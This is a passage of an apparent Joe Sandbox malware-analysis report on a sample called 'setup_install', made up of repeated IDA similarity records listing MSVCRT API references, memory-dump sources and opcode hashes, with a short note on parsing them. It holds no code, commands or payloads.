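Run stand-alone it prints one row per record; the abort function comes out with a dominant stride of 5 bytes (eleven 5-byte gaps and one 8-byte gap across 0x499636 to 0x499675), which is the pattern to check before treating the thirteen references as thirteen separate abort paths. On the full report, feed this whole section to parse_records and group the rows by Opcode ID to see which function bodies recur across the dumps.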
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 076a00976dfb80bcdb6f4658677b80d7519e49772048efb089ddc15baa560268
                                        • Instruction ID: 77fd5f2651f63aab6c2ed36661040157c27f924d65b9393d475c9b9bc4cfe686
                                        • Opcode Fuzzy Hash: 076a00976dfb80bcdb6f4658677b80d7519e49772048efb089ddc15baa560268
                                        • Instruction Fuzzy Hash: 71E01232A0821386C320DE2685411B7B2F5EA85744F155D3F9456B3642E635ED05419F
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 01a1d99a90d6c707e848fdad04094c9b2cd7c764a29037a37c17a44a7eaed4cb
                                        • Instruction ID: 6569aedd147723a9b7e9a083ae98b087864d58d252bbd6b9aae0acc0521a0971
                                        • Opcode Fuzzy Hash: 01a1d99a90d6c707e848fdad04094c9b2cd7c764a29037a37c17a44a7eaed4cb
                                        • Instruction Fuzzy Hash: 85E030319593068BC251FF09A08906AF7F5FAC5304F2529AED64073205C774E8118A4A
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 425b95c8954d8954866e041d2ea67ae6ae64fd65efa557b980d85819405087e3
                                        • Instruction ID: 47d45a21dc9da5cbf119aed57b7a39833456db12926cd7b5308aee2411d07cef
                                        • Opcode Fuzzy Hash: 425b95c8954d8954866e041d2ea67ae6ae64fd65efa557b980d85819405087e3
                                        • Instruction Fuzzy Hash: 1AE0863290C70686CB14EE2684511F9F7F1DF46308F106C2EE55673401D328FD02465D
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 43b77c182e1026021a3827c2adf456a1a16ed12c9f066326263567961f0f22b4
                                        • Instruction ID: 3fb2bab94def2682de04cc624690b9885afd2e6146762c07f2723b2a82d0c594
                                        • Opcode Fuzzy Hash: 43b77c182e1026021a3827c2adf456a1a16ed12c9f066326263567961f0f22b4
                                        • Instruction Fuzzy Hash: F6E04F32A693028BC250EF1AA1890A9F7B5FAC6300F5429AED540B3245C735E810464A
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: eb61d258ec19aa3b9dabd00b3b32eb4974483a2cb9952fc191203196eaf02b32
                                        • Instruction ID: 27e75b87c8c556204d3e58a011ac7557aa32cd94c1b453a40c3bbf23f6ac0874
                                        • Opcode Fuzzy Hash: eb61d258ec19aa3b9dabd00b3b32eb4974483a2cb9952fc191203196eaf02b32
                                        • Instruction Fuzzy Hash: F4D0A733F0C303868220EF3745410B6F6F4EA06344F002C2EE545B3541C728EC0141AF
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 7c34f5ddf73a498a8dba9dc715669dcc7f8a671f9b35c7c1efc8a1a8cf7afd97
                                        • Instruction ID: bbe6826697165056da68c048438b54108aef425b2c7be6467ff2312765969d2d
                                        • Opcode Fuzzy Hash: 7c34f5ddf73a498a8dba9dc715669dcc7f8a671f9b35c7c1efc8a1a8cf7afd97
                                        • Instruction Fuzzy Hash: CCD0123394C309468510FE5615920F9F3B5DA47329F953D2EE60133192572DEC82559F
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: a688913ad4fa65ed137303da6d8d0c00b3ab03f337747d8a89eab188a2335a5e
                                        • Instruction ID: 646c923cc7ebc6a68aa9e321f5a77be5ca020489a79533d5842a560ae8c36f7c
                                        • Opcode Fuzzy Hash: a688913ad4fa65ed137303da6d8d0c00b3ab03f337747d8a89eab188a2335a5e
                                        • Instruction Fuzzy Hash: 92D01233A4C30946C130FEA615520FAF2B4CA47308F557C2FAA0533152576CEC42559F
                                        APIs
                                        • abort.MSVCRT ref: 0040F490
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_once
                                        • String ID:
                                        • API String ID: 3910317518-0
                                        • Opcode ID: 6ec3d5b9bd6f69669cd65bffb03aa232b755a847752ff0c4c29b247166523656
                                        • Instruction ID: 736a26c4a6b40e3f1f17c53e74789277cc966c9f01987e300ea8d8fcb34b0e56
                                        • Opcode Fuzzy Hash: 6ec3d5b9bd6f69669cd65bffb03aa232b755a847752ff0c4c29b247166523656
                                        • Instruction Fuzzy Hash: BF51D5B19087418BD720CF28C08079ABBE1FF85328F19487EE9D567396C379A849CB85
                                        APIs
                                          • Part of subcall function 0040E520: strlen.MSVCRT ref: 0040E5A3
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0040F4EE
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$pthread_oncestrlen
                                        • String ID:
                                        • API String ID: 2914753974-0
                                        • Opcode ID: be6be2bec18d56986fe5741742b30037397fa534f6d81c010a8ec38caa09bf24
                                        • Instruction ID: 07d3691a36234da053407c49e703b9b408d380c6a60faa69308048b3a78be5c2
                                        • Opcode Fuzzy Hash: be6be2bec18d56986fe5741742b30037397fa534f6d81c010a8ec38caa09bf24
                                        • Instruction Fuzzy Hash: 5F312AB010C3C4DAEB21DB29A9847567FD5AB96328F0485BED7845F2D3D3BA4408C76E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 265fee3adc4fb8debe1673d85d789cd1a6748779c2f9a7b708e4cf1f64a6f010
                                        • Instruction ID: 8d7897311d65d9350a495fca5f6ee5195a158cf46b70a449af6fee7f981d32cd
                                        • Opcode Fuzzy Hash: 265fee3adc4fb8debe1673d85d789cd1a6748779c2f9a7b708e4cf1f64a6f010
                                        • Instruction Fuzzy Hash: A741E5729083415FDB359E2984807A7BBA1AF81318F18847EDD816BBD1C339DC4AC789
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72cb5ba446833af3eaadcca9dafd1fdcc63a6d46fa9728211d569cbc7fa17c28
                                        • Instruction ID: 00ed09e5a337d481d5ae919d8981c46beda42d4d7fa50a5c16f84db94f78ee9f
                                        • Opcode Fuzzy Hash: 72cb5ba446833af3eaadcca9dafd1fdcc63a6d46fa9728211d569cbc7fa17c28
                                        • Instruction Fuzzy Hash: 46F0FC719152004AEB70AF59A4843B377A0AB4632CF0448BBDA441B297D23DCC898B8E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID:
                                        • API String ID: 39653677-0
                                        • Opcode ID: 8d33c236e32c765190b7e4ad8361ef50fb01626d53bb75ed14065f70911ebaac
                                        • Instruction ID: e70548041981f1456dec0f81a701b5000e8c9aa41b6f36bd593b82a7aa84c78f
                                        • Opcode Fuzzy Hash: 8d33c236e32c765190b7e4ad8361ef50fb01626d53bb75ed14065f70911ebaac
                                        • Instruction Fuzzy Hash: 9811C372A193008BD734DE69D88166AB3E4EFC5304F108D3FE948A3781D779C8498B9A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: <sI
                                        • API String ID: 2803490479-3642889959
                                        • Opcode ID: a7624a5f8bd310a61f588081697e8fada8fea75ffa567edbc5cb5e5221356bcc
                                        • Instruction ID: 7a9debeec0b5186d5d3726e38c7d0303cd2f8b5d174b8da82a2da4ed3841b454
                                        • Opcode Fuzzy Hash: a7624a5f8bd310a61f588081697e8fada8fea75ffa567edbc5cb5e5221356bcc
                                        • Instruction Fuzzy Hash: 0F1249706087068FC714CF19C48069AB7E1BF88354F158A2EF89997351D7B8EDC5CB8A
                                        APIs
                                        • abort.MSVCRT(?,?,474E5543,?,00493700,?,?,?,?,?,?,00496D2F,?,?,?,?), ref: 00497CA8
                                        • abort.MSVCRT(?,?,474E5543,?,00493700,?,?,?,?,?,?,00496D2F,?,?,?,?), ref: 00497CB5
                                        • fwrite.MSVCRT ref: 00497D13
                                        • fputs.MSVCRT ref: 00497D28
                                        • fputc.MSVCRT ref: 00497D41
                                        • abort.MSVCRT ref: 00497D4B
                                        • free.MSVCRT ref: 00497D53
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$fputcfputsfreefwrite
                                        • String ID:
                                        • API String ID: 3364258748-0
                                        • Opcode ID: 429a767819aef2c6f0d05f6cd234bc4ca3c19398030845bbb839102e4c33c7e3
                                        • Instruction ID: 7d373c2e629130ab408fb27a1d864f45dcc40bdf494651f3e0ed403c85bb1a8b
                                        • Opcode Fuzzy Hash: 429a767819aef2c6f0d05f6cd234bc4ca3c19398030845bbb839102e4c33c7e3
                                        • Instruction Fuzzy Hash: 8A11AFB19187108BDB007FB6C44626DBEE5EF45348F02492FF1C957242DB7D44809BAB
                                        APIs
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 94ae119d985e34916c74491cb9474e9f4dd477538edefa849fc86b687acadb10
                                        • Instruction ID: bbd90c9b371175910635ffd915dfb9acc1b36f51aea892c87def14e0376ba845
                                        • Opcode Fuzzy Hash: 94ae119d985e34916c74491cb9474e9f4dd477538edefa849fc86b687acadb10
                                        • Instruction Fuzzy Hash: 0EF05CB2E0C2850BD710EB1484C03757BA09B57308F5814BEE554272C3C32D9C9DC75E
                                        Memory Dump Source
